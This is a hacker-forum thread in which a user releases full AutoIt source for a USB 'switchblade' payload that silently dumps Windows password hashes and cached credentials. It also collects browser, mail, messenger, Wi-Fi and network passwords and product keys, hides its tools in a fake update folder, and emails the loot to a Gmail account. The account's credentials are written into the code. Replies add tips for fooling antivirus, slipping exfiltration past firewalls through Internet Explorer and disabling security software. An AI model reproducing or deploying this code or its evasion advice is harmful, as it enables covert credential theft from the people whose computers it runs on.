X3N Posted October 28, 2008 Share Posted October 28, 2008 dun dun dun... ok i finally decided to release my code. Hopefully there will be some suggestions on how to make it better. I have a main Payload and an SMTP mailer payload they both work great. I am also working on creating a multi OS Development environment with a GUI so anybody can throw to get their own payload fast. I dislike the U3 customizer because it pretty much sucks. Currently there are two possible methods to us the LP installer. One is to change your hosts file or dns entry and the other is to modify the exe to point to localhost or your own custom server name. The Launcher Script which launches both the payload and pstart menu. #cs ---------------------------------------------------------------------------- AutoIt Version: 3.2.13.0 (beta) Author: X3n Script Function: Switchblade starter #ce ---------------------------------------------------------------------------- #include <Date.au3> $usb = DriveGetDrive("REMOVABLE") If Not @error Then ;MsgBox(4096, "", "Found " & $usb[0] & " drives") For $i = 1 To $usb[0] If DriveGetLabel($usb[$i]) = "X3N" Then Global $usbdr = $usb[$i] EndIf Next EndIf Run ( $usbdr & "pstart" ) Run ( "SYSTEM\SRC\go.exe" , "SYSTEM\SRC\" ) Main Go.Exe code #cs ---------------------------------------------------------------------------- AutoIt Version: 3.2.13.0 (beta) Author: X3n Script Function: REdo of switchblade #ce ---------------------------------------------------------------------------- #include <Date.au3> #NoTrayIcon ; Find USB drive letter & set as variable $usb = DriveGetDrive("REMOVABLE") If Not @error Then For $i = 1 To $usb[0] If DriveGetLabel($usb[$i]) = "X3N" Then Global $usbdr = $usb[$i] EndIf Next EndIf $time = @HOUR & "-" & @MIN & "-" & @SEC EnvUpdate() $computername = EnvGet("computername") $systemroot = EnvGet("systemroot") $logdir = $usbdr & "\System\Logs\" & $computername ;log file $log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log" ;templogfiles $tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log" $tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log" $tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log" $tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log" $tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log" $tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log" $tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log" $tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log" $tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log" $tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log" ;Run Pstart menu Run( $usbdr & "pstart" ) DirCreate( $logdir ) ;Run( "csrsss.exe" ) ;Remove previous run of fgdump if it exists DirRemove( $systemroot & "\$NtUninstallKB531336$", 1) ;Open log file for editing... and adding logs... $file = FileOpen($log, 1) ;create and run fgdump on local system DirCreate( $systemroot & "\$NtUninstallKB531336$" ) FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" ) RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE ) ;General Information on computer using autoIT macros FileWriteLine($file, "----------------------X3n's Payload Time Started: " & _Now() & @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, "IP add 1: " & @ipaddress1) FileWriteLine($file, "IP add 2: " &@ipaddress2) FileWriteLine($file, "IP add 3: " &@ipaddress3) FileWriteLine($file, "IP add 4: " &@ipaddress4) FileWriteLine($file, "DNS Domain: " &@LogonDNSDomain) FileWriteLine($file, "Logon Domain: " &@LogonDomain) FileWriteLine($file, "Logon Server: " &@LogonServer) FileWriteLine($file, "Operating System: " &@OSVersion) FileWriteLine($file, "Username: " &@UserName) ;Get pwdump log file FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF) $v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump") FileWrite($file, $v_pwdump) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, _Now() & @CRLF) ;Get cachedump log file FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF) $v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump") FileWrite($file, $v_cdump) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, _Now() & @CRLF) ;password fox FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE) $v_tmplog1 = FileRead($tmplog1) FileWrite($file, $v_tmplog1) ProcessWaitClose("PasswordFox.exe") FileWriteLine($file, _Now() & @CRLF) ; Dump mozilla history FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE) $v_tmplog2 = FileRead($tmplog2) FileWrite($file, $v_tmplog2) FileWriteLine($file, @CRLF) ProcessWaitClose("MHV.exe") ;Dump ie saved passwords FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE) $v_tmplog3 = FileRead($tmplog3) FileWrite($file, $v_tmplog3) FileWriteLine($file, @CRLF) ProcessWaitClose("iepv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump mail passwords FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE) $v_tmplog4 = FileRead($tmplog4) FileWrite($file, $v_tmplog4) FileWriteLine($file, @CRLF) ProcessWaitClose("mpv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Product Keys FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE) $v_tmplog5 = FileRead($tmplog5) FileWrite($file, $v_tmplog5) FileWriteLine($file, @CRLF) ProcessWaitClose("prok.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump protected storage FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE) $v_tmplog6 = FileRead($tmplog6) FileWrite($file, $v_tmplog6) FileWriteLine($file, @CRLF) ProcessWaitClose("pspv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump WIFI saved Keys FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE) $v_tmplog7 = FileRead($tmplog7) FileWrite($file, $v_tmplog7) FileWriteLine($file, @CRLF) ProcessWaitClose("wkv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Network passwords FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE) $v_tmplog8 = FileRead($tmplog8) FileWrite($file, $v_tmplog8) FileWriteLine($file, @CRLF) ProcessWaitClose("netpass.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Messenger passwords FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE) $v_tmplog9 = FileRead($tmplog9) FileWrite($file, $v_tmplog9) FileWriteLine($file, @CRLF) ProcessWaitClose("mspass.exe") FileWriteLine($file, _Now() & @CRLF) FileWriteLine($file, "-------------------------X3n's Payload Time Ended: " & _Now() & @CRLF) DirRemove( $systemroot & "\$NtUninstallKB531336$", 1) FileClose($file) FileDelete($tmplog1) FileDelete($tmplog2) FileDelete($tmplog3) FileDelete($tmplog4) FileDelete($tmplog5) FileDelete($tmplog6) FileDelete($tmplog7) FileDelete($tmplog8) FileDelete($tmplog9) FileDelete($tmplog10) SMTP mailer go-smtp.exe #cs ---------------------------------------------------------------------------- AutoIt Version: 3.2.13.0 (beta) Author: X3n Script Function: REdo of switchblade #ce ---------------------------------------------------------------------------- #include <Date.au3> #NoTrayIcon ; Find USB drive letter & set as variable $usb = DriveGetDrive("REMOVABLE") If Not @error Then For $i = 1 To $usb[0] If DriveGetLabel($usb[$i]) = "X3N" Then Global $usbdr = $usb[$i] EndIf Next EndIf $time = @HOUR & "-" & @MIN & "-" & @SEC EnvUpdate() $computername = EnvGet("computername") $systemroot = EnvGet("systemroot") $logdir = $usbdr & "\System\Logs\" & $computername ;log files $log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log" ;templogfiles $tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log" $tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log" $tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log" $tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log" $tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log" $tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log" $tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log" $tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log" $tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log" $tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log" ;email to gmail account settings $emailfrom = ("hckbld") $emailto = ("hckbld@gmail.com") $epassword = ("hckbld#2008") $subject = $computername & $time ;Run Pstart menu Run( $usbdr & "pstart" ) DirCreate( $logdir ) ;Run( "csrsss.exe" ) ;Remove previous run of fgdump if it exists DirRemove( $systemroot & "\$NtUninstallKB531336$", 1) ;Open log file for editing... and adding logs... $file = FileOpen($log, 1) ;create and run fgdump on local system DirCreate( $systemroot & "\$NtUninstallKB531336$" ) FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" ) RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE ) ;General Information on computer using autoIT macros FileWriteLine($file, "----------------------X3n's Payload Time Started: " & _Now() & @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, "IP add 1: " & @ipaddress1) FileWriteLine($file, "IP add 2: " &@ipaddress2) FileWriteLine($file, "IP add 3: " &@ipaddress3) FileWriteLine($file, "IP add 4: " &@ipaddress4) FileWriteLine($file, "DNS Domain: " &@LogonDNSDomain) FileWriteLine($file, "Logon Domain: " &@LogonDomain) FileWriteLine($file, "Logon Server: " &@LogonServer) FileWriteLine($file, "Operating System: " &@OSVersion) FileWriteLine($file, "Username: " &@UserName) ;Get pwdump log file FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF) $v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump") FileWrite($file, $v_pwdump) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, _Now() & @CRLF) ;Get cachedump log file FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF) $v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump") FileWrite($file, $v_cdump) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, _Now() & @CRLF) ;password fox FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF) FileWriteLine($file, @CRLF) FileWriteLine($file, @CRLF) Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE) $v_tmplog1 = FileRead($tmplog1) FileWrite($file, $v_tmplog1) ProcessWaitClose("PasswordFox.exe") FileWriteLine($file, _Now() & @CRLF) ; Dump mozilla history FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE) $v_tmplog2 = FileRead($tmplog2) FileWrite($file, $v_tmplog2) FileWriteLine($file, @CRLF) ProcessWaitClose("MHV.exe") ;Dump ie saved passwords FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE) $v_tmplog3 = FileRead($tmplog3) FileWrite($file, $v_tmplog3) FileWriteLine($file, @CRLF) ProcessWaitClose("iepv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump mail passwords FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE) $v_tmplog4 = FileRead($tmplog4) FileWrite($file, $v_tmplog4) FileWriteLine($file, @CRLF) ProcessWaitClose("mpv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Product Keys FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE) $v_tmplog5 = FileRead($tmplog5) FileWrite($file, $v_tmplog5) FileWriteLine($file, @CRLF) ProcessWaitClose("prok.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump protected storage FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE) $v_tmplog6 = FileRead($tmplog6) FileWrite($file, $v_tmplog6) FileWriteLine($file, @CRLF) ProcessWaitClose("pspv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump WIFI saved Keys FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE) $v_tmplog7 = FileRead($tmplog7) FileWrite($file, $v_tmplog7) FileWriteLine($file, @CRLF) ProcessWaitClose("wkv.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Network passwords FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE) $v_tmplog8 = FileRead($tmplog8) FileWrite($file, $v_tmplog8) FileWriteLine($file, @CRLF) ProcessWaitClose("netpass.exe") FileWriteLine($file, _Now() & @CRLF) ;Dump Messenger passwords FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF) Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE) $v_tmplog9 = FileRead($tmplog9) FileWrite($file, $v_tmplog9) FileWriteLine($file, @CRLF) ProcessWaitClose("mspass.exe") FileWriteLine($file, _Now() & @CRLF) FileWriteLine($file, "-------------------------X3n's Payload Time Ended: " & _Now() & @CRLF) DirRemove( $systemroot & "\$NtUninstallKB531336$", 1) FileClose($file) FileDelete($tmplog1) FileDelete($tmplog2) FileDelete($tmplog3) FileDelete($tmplog4) FileDelete($tmplog5) FileDelete($tmplog6) FileDelete($tmplog7) FileDelete($tmplog8) FileDelete($tmplog9) FileDelete($tmplog10) #Include<file.au3> Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc") ;################################## ; Include ;################################## #Include<file.au3> ;################################## ; Variables ;################################## $s_SmtpServer = "smtp.gmail.com" ; address for the smtp-server to use - REQUIRED $s_FromName = "xxx" ; name from who the email was sent $s_FromAddress = "xxx@gmail.com" ; address from where the mail should come $s_ToAddress = "xxx@gmail.com" ; destination address of the email - REQUIRED $s_Subject = $log ; subject from the email - can be anything you want it to be $as_Body = "" ; the messagebody from the mail - can be left blank but then you get a blank mail $s_AttachFiles = $log ; the file you want to attach- leave blank if not needed $s_CcAddress = "" ; address for cc - leave blank if not needed $s_BccAddress = "" ; address for bcc - leave blank if not needed $s_Username = "xxxxx" ; username for the account used from where the mail gets sent - Optional (Needed for eg GMail) $s_Password = "xxxxx" ; password for the account used from where the mail gets sent - Optional (Needed for eg GMail) $IPPort = 465 ; port used for sending the mail $ssl = 1 ; enables/disables secure socket layer sending - put to 1 if using httpS ;~ $IPPort=465 ; GMAIL port used for sending the mail ;~ $ssl=1 ; GMAILenables/disables secure socket layer sending - put to 1 if using httpS ;################################## ; Script ;################################## Global $oMyRet[2] Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc") $rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $s_AttachFiles, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl) If @error Then MsgBox(0, "Error sending message", "Error code:" & @error & " Rc:" & $rc) EndIf ; Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Username = "", $s_Password = "",$IPPort=25, $ssl=0) $objEmail = ObjCreate("CDO.Message") $objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>' $objEmail.To = $s_ToAddress Local $i_Error = 0 Local $i_Error_desciption = "" If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress $objEmail.Subject = $s_Subject If StringInStr($as_Body,"<") and StringInStr($as_Body,">") Then $objEmail.HTMLBody = $as_Body Else $objEmail.Textbody = $as_Body & @CRLF EndIf If $s_AttachFiles <> "" Then Local $S_Files2Attach = StringSplit($s_AttachFiles, ";") For $x = 1 To $S_Files2Attach[0] $S_Files2Attach[$x] = _PathFull ($S_Files2Attach[$x]) If FileExists($S_Files2Attach[$x]) Then $objEmail.AddAttachment ($S_Files2Attach[$x]) Else $i_Error_desciption = $i_Error_desciption & @lf & 'File not found to attach: ' & $S_Files2Attach[$x] SetError(1) return 0 EndIf Next EndIf $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort ;Authenticated SMTP If $s_Username <> "" Then $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password EndIf If $Ssl Then $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True EndIf ;Update settings $objEmail.Configuration.Fields.Update ; Sent the Message $objEmail.Send if @error then SetError(2) return $oMyRet[1] EndIf EndFunc ;==>_INetSmtpMailCom ; ; ; Com Error Handler Func MyErrFunc() $HexNumber = Hex($oMyError.number, 8) $oMyRet[0] = $HexNumber $oMyRet[1] = StringStripWS($oMyError.description,3) ConsoleWrite("### COM Error ! Number: " & $HexNumber & " ScriptLine: " & $oMyError.scriptline & " Description:" & $oMyRet[1] & @LF) SetError(1); something to check for when this function returns Return EndFunc ;==>MyErrFunc Quote Link to comment Share on other sites More sharing options...
X3N Posted October 28, 2008 Author Share Posted October 28, 2008 I'll be posting my development enviroment gui soon plus the non-u3 versions of this code. Quote Link to comment Share on other sites More sharing options...
Matessim Posted October 30, 2008 Share Posted October 30, 2008 any chance you can upload? Quote Link to comment Share on other sites More sharing options...
X3N Posted October 30, 2008 Author Share Posted October 30, 2008 im working on finishing my entire development enviroment and i'll upload a zip of the whole thing when its finsihed Quote Link to comment Share on other sites More sharing options...
DMilton Posted October 30, 2008 Share Posted October 30, 2008 Good work. I will donwnoad AutoIT to compile the modules and see how it works... Thanks! Quote Link to comment Share on other sites More sharing options...
X3N Posted October 30, 2008 Author Share Posted October 30, 2008 Good work. I will donwnoad AutoIT to compile the modules and see how it works... Thanks! You don't even have to compile it to run it. Just install autoIT and you can just run the scripts. Also its meant to be run with the latest nirsoft programs so if anyone is interested they can just roll their own payload. Quote Link to comment Share on other sites More sharing options...
Matessim Posted October 31, 2008 Share Posted October 31, 2008 Ok,good Quote Link to comment Share on other sites More sharing options...
X3N Posted December 22, 2008 Author Share Posted December 22, 2008 Posting u3 dev enviroment. ver .01b http://dl.getdropbox.com/u/332413/u3dev/u3dev.7z Quote Link to comment Share on other sites More sharing options...
DMilton Posted December 22, 2008 Share Posted December 22, 2008 I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3? Is the original host files copied and reinstalled after the iso is updated? :edit answered FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" ) .. .. If FileExists( @SystemDir & "\drivers\etc\hosts.orig")Â Â Then FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" ) WOW! Quote Link to comment Share on other sites More sharing options...
kickarse Posted December 22, 2008 Share Posted December 22, 2008 I would have fileinstall install files with different names that way it can fool some of the virus scanners. Other than that fairly good. You could also adapt this script i wrote to capture what's installed Dim $strComputer, $objWMIService Const $wbemFlagReturnImmediately = 0x10 Const $wbemFlagForwardOnly = 0x20 $strComputer = "." $objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2") _Read_Products() Exit Func _Read_Products() Local $colItems = ""   $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")     For $objItem in $colItems ;$ProductName = $objItem.Name         Select             Case stringinstr($objItem.Name,'Microsoft .NET Framework');and StringLeft($objItem.Version,'3')="3.5"                 msgbox(0,"Found",$objItem.Name & @CRLF & $objItem.Version) ;Return 1         EndSelect   Next EndFunc How come you use EnvGet and don't use @computername or @systemdir? _Filewritelog will give you the time and date on each line. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 22, 2008 Author Share Posted December 22, 2008 I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3? Is the original host files copied and reinstalled after the iso is updated? :edit answered FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" ) .. .. If FileExists( @SystemDir & "\drivers\etc\hosts.orig")Â Â Then FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" ) WOW! yeah thast what i made it do Quote Link to comment Share on other sites More sharing options...
X3N Posted December 22, 2008 Author Share Posted December 22, 2008 im also working on an incident response package in autoIT Quote Link to comment Share on other sites More sharing options...
DMilton Posted December 22, 2008 Share Posted December 22, 2008 What about the GUI? Quote Link to comment Share on other sites More sharing options...
X3N Posted December 22, 2008 Author Share Posted December 22, 2008 What about the GUI? i didnt clean up the files well enough some of those files i was using for development wstart has everything in it some of the others are just extra. i was using KODa to generate the gui layout Quote Link to comment Share on other sites More sharing options...
DMilton Posted December 22, 2008 Share Posted December 22, 2008 Ok, ok, ok... I was seeing it at now... I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80. Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 23, 2008 Share Posted December 23, 2008 Ok, ok, ok... I was seeing it at now... I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80. how about doing the php log transfer thing with autoit? When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls. DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET? I think I have found a way to bypass this completely. Autoit has a way of accessing webpages in the backround with ie...which is typically already allowed internet access. Using this method and php, logs can be transferred without any kind of interruption. I have most of the stuff already coded in autoit--i am currently working out the bugs. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 23, 2008 Author Share Posted December 23, 2008 how about doing the php log transfer thing with autoit? When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls. DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET? I think I have found a way to bypass this completely. Autoit has a way of accessing webpages in the backround with ie...which is typically already allowed internet access. Using this method and php, logs can be transferred without any kind of interruption. I have most of the stuff already coded in autoit--i am currently working out the bugs. im not overly concerned with the php log stuff... i can definitly add the functionality if someone else wants to write it. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 23, 2008 Author Share Posted December 23, 2008 I would have fileinstall install files with different names that way it can fool some of the virus scanners. Other than that fairly good. You could also adapt this script i wrote to capture what's installed Dim $strComputer, $objWMIService Const $wbemFlagReturnImmediately = 0x10 Const $wbemFlagForwardOnly = 0x20 $strComputer = "." $objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2") _Read_Products() Exit Func _Read_Products() Local $colItems = ""   $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")     For $objItem in $colItems ;$ProductName = $objItem.Name         Select             Case stringinstr($objItem.Name,'Microsoft .NET Framework');and StringLeft($objItem.Version,'3')="3.5"                 msgbox(0,"Found",$objItem.Name & @CRLF & $objItem.Version) ;Return 1         EndSelect   Next EndFunc How come you use EnvGet and don't use @computername or @systemdir? _Filewritelog will give you the time and date on each line. This was my first attempt at writing anything long in autoIT so the code is messy... i have a way better method now that i'll be releasing soon that uses fileinstall and runs everything in a much more logical way. Quote Link to comment Share on other sites More sharing options...
DMilton Posted December 23, 2008 Share Posted December 23, 2008 how about doing the php log transfer thing with autoit? When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls. DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET? Of course! I didn't thought about it, but I agree that any firewall will trigger the program while accessing the Internet... Then will see on what you have been working when you have it done. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 23, 2008 Author Share Posted December 23, 2008 Of course! I didn't thought about it, but I agree that any firewall will trigger the program while accessing the Internet... Then will see on what you have been working when you have it done. there are many ways to get the log file out but i kinda prefer the gmail method using auotIT because you dont have to use any external programs... Any normal hardware firewall should allow you email access the problem that your talking about is in regards to software firewalls which you should probably disable before running this payload anyways... with a method like the av killer programs... Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 23, 2008 Share Posted December 23, 2008 there are many ways to get the log file out but i kinda prefer the gmail method using auotIT because you dont have to use any external programs... Any normal hardware firewall should allow you email access the problem that your talking about is in regards to software firewalls which you should probably disable before running this payload anyways... with a method like the av killer programs... I have McAfee (and so do most the people I know). I know for a fact that most people *do not* use hardware firewalls. McAfee firewall blocks all attempts made by the autoit program. I have made numerous attempts to "disable" my McAfee firewall (processkilling, etc). The only thing left would be to permanently disable the program (leaving massive tracks). The best solution is to bypass the firewall using a commonly used universal program (hence internet explorer). Quote Link to comment Share on other sites More sharing options...
DMilton Posted December 24, 2008 Share Posted December 24, 2008 Yes, the problem is with any firewall software, then there's another problem that is to disable the firewall software. You can do it in windows but must to kill the task with other firewall software... Then double problem! One: Disable the antivirus... Two: Disable the firewall... With the batch method, you doesn't need to disable (or allow) anything but the antivirus software. Please, correct me if is not as I'm saying. I think a good solution is calling a batch from the AutoIT program, give it the correct parameters into variables and do the task with the batch. Other way could be using different ways (ftp, http post, email), selectable by the user in a pre-configuration (by the GUI) to send the logs and calling different batches from the compiled exe with the options elected. Then the payload would work for anyone using it. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 24, 2008 Author Share Posted December 24, 2008 Yes, the problem is with any firewall software, then there's another problem that is to disable the firewall software. You can do it in windows but must to kill the task with other firewall software... Then double problem! One: Disable the antivirus... Two: Disable the firewall... With the batch method, you doesn't need to disable (or allow) anything but the antivirus software. Please, correct me if is not as I'm saying. I think a good solution is calling a batch from the AutoIT program, give it the correct parameters into variables and do the task with the batch. Other way could be using different ways (ftp, http post, email), selectable by the user in a pre-configuration (by the GUI) to send the logs and calling different batches from the compiled exe with the options elected. Then the payload would work for anyone using it. well if you want you can add the autoIT executable and call the script from a bat script because all you need is the standalone autoIT executable to run the scripts without compiling them. I'm not against using the IE php method i just prefer the gmail method... plus i dont have access to my own webserver yet. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.